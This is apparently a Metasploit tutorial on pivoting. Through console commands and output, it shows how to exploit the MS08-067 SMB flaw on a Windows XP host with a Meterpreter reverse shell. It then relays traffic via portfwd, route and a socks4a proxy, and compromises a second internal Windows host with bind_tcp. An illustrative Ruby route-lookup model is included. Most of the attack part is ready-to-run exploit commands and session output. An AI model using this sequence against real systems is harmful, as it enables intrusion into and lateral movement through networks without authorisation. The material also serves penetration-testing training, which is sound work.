Pivoting

The Metasploit Framework supports a basic version of pivoting through the Meterpreter payload. Pivoting support is limited to Windows targets and only supports outbound TCP connections. As of version 3.3.2 the pivoting functionality in the Metasploit Framework is robust enough for common tasks. The first step to using pivoting is to gain access to a system using the Meterpreter payload. The example below demonstrates the process for exploiting the MS08-067 Server Service flaw on a Windows XP system.

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.136 
msf exploit(ms08_067_netapi) > set LPORT 4444 
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.141
msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.136:4444 -> 192.168.0.141:1042)

meterpreter > 

Once a Meterpreter session is active, we have the ability to relay TCP connections through the target machine. If you have compromised an internal system and would like to reach an internal web server, the portfwd command does the trick:

meterpreter> portfwd add -l 8000 -p 80 -r 10.0.0.1
[*] Local TCP relay created: 0.0.0.0:8000 <-> 10.0.0.1:80

At this point a new service is exposed on the system running Metasploit that forwards all traffic to the specified host and port through the target. If we open our browser to http://127.0.0.1:8000/, our connection will be relayed across the Meterpreter session (over SSL since 3.3) and to the target server, displaying the internal web page locally. The portfwd command can be used with any TCP-based service on the target's network and is a great way to demonstrate access to internal resources once an internal user's machine has been compromised.

Instead of using the portfwd command directly, we can use the route command built into the Metasploit Framework console. First we need to place the Meterpreter session into the background:

meterpreter > background
msf>

Then we use the route command to tell the framework that all connections should be relayed through the Meterpreter session. The arguments are subnet, netmask and session ID; a subnet and netmask of 0.0.0.0 match every destination, and 1 is the session opened above:

msf> route add 0.0.0.0 0.0.0.0 1

We can verify that the route is working using the connect command from the console:

msf> connect 10.0.0.1 80
GET / HTTP/1.0

HTTP/1.0 200 OK
< html data >
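To make the route lookup concrete, the following Ruby model shows how a pivot route table picks the session for a destination, including a more specific second route beside the catch-all used above. This is example code written for this page, not Metasploit's own Rex::Socket::SwitchBoard; the longest-mask selection rule, the 10.0.1.0/24 route and session 2 are assumptions constructed for the illustration.

```ruby
require 'ipaddr'

# Hypothetical model of the console's route table for this page
# (not the framework's own implementation).
Route = Struct.new(:subnet, :netmask, :session)

class PivotRouteTable
  def initialize
    @routes = []
  end

  # Mirrors "route add <subnet> <netmask> <session>" from the console.
  def add(subnet, netmask, session)
    @routes << Route.new(IPAddr.new(subnet), IPAddr.new(netmask), session)
    self
  end

  # Mask length in bits: 0.0.0.0 => 0, 255.255.255.0 => 24.
  def prefix_length(netmask)
    netmask.to_i.to_s(2).count('1')
  end

  # Choose the most specific (longest-mask) route covering the destination.
  # Returns the session ID, or nil when no route matches, in which case the
  # connection leaves directly from the console host rather than via a pivot.
  def best_session(host)
    ip = IPAddr.new(host)
    matching = @routes.select do |r|
      (ip.to_i & r.netmask.to_i) == (r.subnet.to_i & r.netmask.to_i)
    end
    best = matching.max_by { |r| prefix_length(r.netmask) }
    best && best.session
  end
end

# Constructed table: the catch-all from the page plus an assumed second hop.
def demo_table
  table = PivotRouteTable.new
  table.add('0.0.0.0', '0.0.0.0', 1)        # everything via session 1
  table.add('10.0.1.0', '255.255.255.0', 2) # assumed subnet only reachable via session 2
  table
end
```

With this table, 10.0.0.1 (the internal web server above) resolves to session 1, while a host in 10.0.1.0/24 resolves to the more specific session 2.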

At this point, we can also use the socks4a proxy to allow other programs, like Firefox, to pivot through the encrypted tunnel and browse the internal network from the pivot machine.

msf> use auxiliary/server/socks4a 
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  1080             yes       The port to listen on.

msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

Once a route has been created, we can relay attacks through the established Meterpreter session and compromise internal machines. The pivoting feature supports outbound and inbound TCP connections, so we can use reverse_tcp stagers with LHOST set to the pivot machine, or simply bind_tcp stagers if the internal machine does not have direct access to the attacking system. In most cases, where the network has no egress filters, reverse_tcp stagers back to the attacker will work fine (make sure LHOST is your real external IP address). The example below demonstrates the compromise of an internal machine through a relayed session.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LPORT 8989
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.2
msf exploit(ms08_067_netapi) > exploit 

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 2 opened (192.168.0.136-192.168.0.141:0 -> 10.0.0.2:8989)

meterpreter >